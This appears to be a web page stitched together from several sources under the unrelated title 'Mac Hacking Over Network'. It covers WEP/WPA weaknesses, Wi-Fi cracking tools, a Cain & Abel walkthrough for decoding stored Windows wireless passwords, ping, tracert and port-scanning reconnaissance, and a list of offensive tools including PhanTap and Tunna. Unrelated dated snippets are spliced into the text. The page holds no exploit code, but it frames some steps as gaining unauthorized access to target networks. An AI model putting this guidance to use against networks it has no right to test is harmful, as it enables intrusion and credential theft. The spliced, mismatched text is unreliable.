Mac Hacking Over Network

Wireless networks are accessible to anyone within the router’s transmission radius. This makes them vulnerable to attacks. Hotspots are available in public places such as airports, restaurants, parks, etc.

In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect against such attacks.

  • NMAP (Network Mapper) Get The Complete Nmap Ethical Hacking Course: Become an expert in Network Security. Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.
  • Mar 12, 2018  Active sniffing is intercepting packages transmitted over a network that uses a switch. There are two main methods used to sniff switch linked networks, ARP Poisoning, and MAC flooding. Hacking Activity: Sniff network traffic In this practical scenario, we are going to use Wireshark to sniff data packets as they are transmitted over HTTP protocol.

Jan 12, 2018  I wished there was a way to send it over the network to another machine. That’s what this trick does. First, go to and download TCPSyphon and unzip it onto the server (pro6) machine and client (OBS OBSproject.com) machine. (You might have another use for this, but this is what I’m showing). Jul 14, 2019  Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. How to hack your own Wi-Fi network Free (or almost free) Wi-Fi penetration testing tools can help you spot potential Wi-Fi security vulnerabilities and figure out ways to protect against them.

Topics covered in this tutorial

What is a wireless network?

A wireless network is a network that uses radio waves to link computers and other devices together. The implementation is done at the Layer 1 (physical layer) of the OSI model.

How to access a wireless network?

You will need a wireless network enabled device such as a laptop, tablet, smartphones, etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access.

Wireless Network Authentication

Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP

WEP is the acronym for Wired Equivalent Privacy. It was developed for IEEE 802.11 WLAN standards. Its goal was to provide the privacy equivalent to that provided by wired networks. WEP works by encrypting the data been transmitted over the network to keep it safe from eavesdropping.

WEP Authentication

Open System Authentication (OSA) – this methods grants access to station authentication requested based on the configured access policy.

Shared Key Authentication (SKA) – This method sends to an encrypted challenge to the station requesting access. The station encrypts the challenge with its key then responds. If the encrypted challenge matches the AP value, then access is granted.

WEP Weakness

WEP has significant design flaws and vulnerabilities.

  • The integrity of the packets is checked using Cyclic Redundancy Check (CRC32). CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
  • WEP uses the RC4 encryption algorithm to create stream ciphers. The stream cipher input is made up of an initial value (IV) and a secret key. The length of the initial value (IV) is 24 bits long while the secret key can either be 40 bits or 104 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long.The lower possible value of the secret key makes it easy to crack it.
  • Weak Initial values combinations do not encrypt sufficiently. This makes them vulnerable to attacks.
  • WEP is based on passwords; this makes it vulnerable to dictionary attacks.
  • Keys management is poorly implemented. Changing keys especially on large networks is challenging. WEP does not provide a centralized key management system.
  • The Initial values can be reused

Because of these security flaws, WEP has been deprecated in favor of WPA

WPA

WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP. It is used to encrypt data on 802.11 WLANs. It uses higher Initial Values 48 bits instead of the 24 bits that WEP uses. It uses temporal keys to encrypt packets.

WPA Weaknesses

  • The collision avoidance implementation can be broken
  • It is vulnerable to denial of service attacks
  • Pre-shares keys use passphrases. Weak passphrases are vulnerable to dictionary attacks.

How to Crack Wireless Networks

WEP cracking

Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;

  • Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
  • Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.

WEP Cracking Tools

  • Aircrack– network sniffer and WEP cracker. Can be downloaded from http://www.aircrack-ng.org/
  • WEPCrack– this is an open source program for breaking 802.11 WEP secret keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
  • Kismet- this can include detector wireless networks both visible and hidden, sniffer packets and detect intrusions. https://www.kismetwireless.net/
  • WebDecrypt– this tool uses active dictionary attacks to crack the WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/

WPA Cracking

WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.

  • CowPatty– this tool is used to crack pre-shared keys (PSK) using brute force attack. http://wirelessdefence.org/Contents/coWPAttyMain.htm
  • Cain & Abel– this tool can be used to decode capture files from other sniffing programs such as Wireshark. The capture files may contain WEP or WPA-PSK encoded frames. http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml

General Attack types

  • Sniffing– this involves intercepting packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
  • Man in the Middle (MITM) Attack– this involves eavesdropping on a network and capturing sensitive information.
  • Denial of Service Attack– the main intent of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack. More on this in article

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.

We will provide you with basic information that can help you get started. Backtrack is a Linux-based security operating system. It is developed on top of Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities and perform exploits among other things.

Some of the popular tools that backtrack has includes;

  • Metasploit
  • Wireshark
  • Aircrack-ng
  • NMap
  • Ophcrack

Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools

A wireless network adapter with the capability to inject packets (Hardware)

  • Kali Operating System. You can download it from here https://www.kali.org/downloads/
  • Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
  • Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
  • Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.

How to Secure wireless networks

In minimizing wireless network attacks; an organization can adopt the following policies

  • Changing default passwords that come with the hardware
  • Enabling the authentication mechanism
  • Access to the network can be restricted by allowing only registered MAC addresses.
  • Use of strong WEP and WPA-PSK keys, a combination of symbols, number and characters reduce the chance of the keys been cracking using dictionary and brute force attacks.
  • Firewall Software can also help reduce unauthorized access.

Hacking Activity: Crack Wireless Password

In this practical scenario, we are going touse Cain and Abel to decode the stored wireless network passwords in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.

Decoding Wireless network passwords stored in Windows

  • Download Cain & Abel from the link provided above.
  • Open Cain and Abel
  • Ensure that the Decoders tab is selected then click on Wireless Passwords from the navigation menu on the left-hand side
  • Click on the button with a plus sign
  • Assuming you have connected to a secured wireless network before, you will get results similar to the ones shown below
  • The decoder will show you the encryption type, SSID and the password that was used.

Summary

  • Wireless network transmission waves can be seen by outsiders, this possesses many security risks.
  • WEP is the acronym for Wired Equivalent Privacy. It has security flaws which make it easier to break compared to other security implementations.
  • WPA is the acronym for Wi-Fi Protected Access. It has security compared to WEP
  • Intrusion Detection Systems can help detect unauthorized access
  • A good security policy can help protect a network.


Network Hacking is gathering an information from network and computers over the internet.

Ways To Attack a Network >>Learn Network Hacking- Intermediate to Advance | Get Certified

Ping

The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every Internet compatible system, including all current Windows versions.

Make sure you are logged on to the net. Open the DOS shell and enter the following PING command:

Ping –a 123.123.12.1

Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:

dialup21982.gateway123.provider.com

Pinging is normally the first step involved in hacking the target. Ping uses ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP Echo reply packets.

All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.

Click Start and then click Run. Now type ping <ip address or hostname>

(For example: ping yahoo.com)

This means that the attacker logged on using “provider.com”.

Unfortunately, there are several IP addresses that cannot be converted into domain names.

For more parameter that could be used with the ping command,
go to DOS prompt and type ping /?.

Ping Sweep

If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap also contains an option to perform ping sweeps.


Mac Hacking Over Network Windows 10


Tracert:

Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.

Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination.

To perform a tracert follow the procedure below.

Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.

If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.

Go to DOS prompt and type tracert <destination address>

(For example: tracert yahoo.com).

Network

Port Scanning:-

After you have determined that your target system is alive the next important step would be to perform a port scan on the target system.

There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap, which has a wide range of options.

Port Scanning Tutorials

Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running, firewalls being used and a lot more.

Common ports:

Below is a list of some common ports and the respective services running on the ports.

20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)

Besides the above ports they are even some ports known as Trojan ports used by Trojans that allow remote access to that system.

Vulnerability Scanning:

Every operating system or the services will have some vulnerabilities due to the programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is an excellent mailing list discussing the vulnerabilities in the various system. The exploit code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.

Some of such vulnerability scanners include Shadow Security Scanner, Stealth HTTP Scanner, Nessus, etc.

Tools Descriptions:

  1. Wireshark (Formely Ethereal) –

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Download Wireshark Here – http://www.wireshark.org/

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the worlds most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here – http://www.nessus.org/download/

3. NMAP (Network Mapper)

>> Get The Complete Nmap Ethical Hacking Course : Become an expert in Network Security

Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Also Read- How To Use NMAP- A Valuable Open Source Network Security Scanner

Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here – http://www.insecure.org/nmap/download.html

4. Nikto

Mac Hacking Over Network Windows 10

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto here

Nikto Tutorial

5. Zenmap

Zenmap- Free Open Source Information Gathering Suite

Zenmap is an free and open source GUI for Nmap. It is available on many operating systems (Linux, Windows, Mac OS X, BSD, etc.) Nmap is used to gather information about any device.

Using the Nmap, we can gather information about any client that is within our network or outside our network, and we can gather information about clients just by knowing their IP.

6. Tunna and PhanTap

Tunna:

A Set of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP
It can be used to bypass network restrictions in fully firewalled environments.

Get Tunna here

Phantom Tap (PhanTap) – An ‘Invisible’ Network Tap Aimed at Red Teams.

With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.

PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X – 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

Get PhanTap here

Hacking

7. John The Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here – http://www.openwall.com/john/

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here – http://yersinia.sourceforge.net/

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here – http://www.heidi.ie/eraser/download.php

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4. 0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here – http://www.chiark.greenend.org.uk/~sgtatham/putty/

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here – http://www.lcpsoft.com/english/download.htm

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here – http://www.oxid.it/cain.html

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g.

It has many uses:

  • Verify that your network is set up the way you intended.
  • Find locations with poor coverage in your WLAN.
  • Detect other networks that may be causing interference on your network.
  • Detect unauthorized rogue access points in your workplace.
  • Help aim directional antennas for long-haul WLAN links.
  • Use it recreationally for WarDriving.

Get NetStumbler Here – http://www.stumbler.net/

15. Hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Mac Hacking Over Network Software

Get hping Here – http://www.hping.org/


For the latest update about Cyber and Infosec World, follow us on Twitter, Facebook, Telegram , Instagram and subscribe to our YouTube Channel.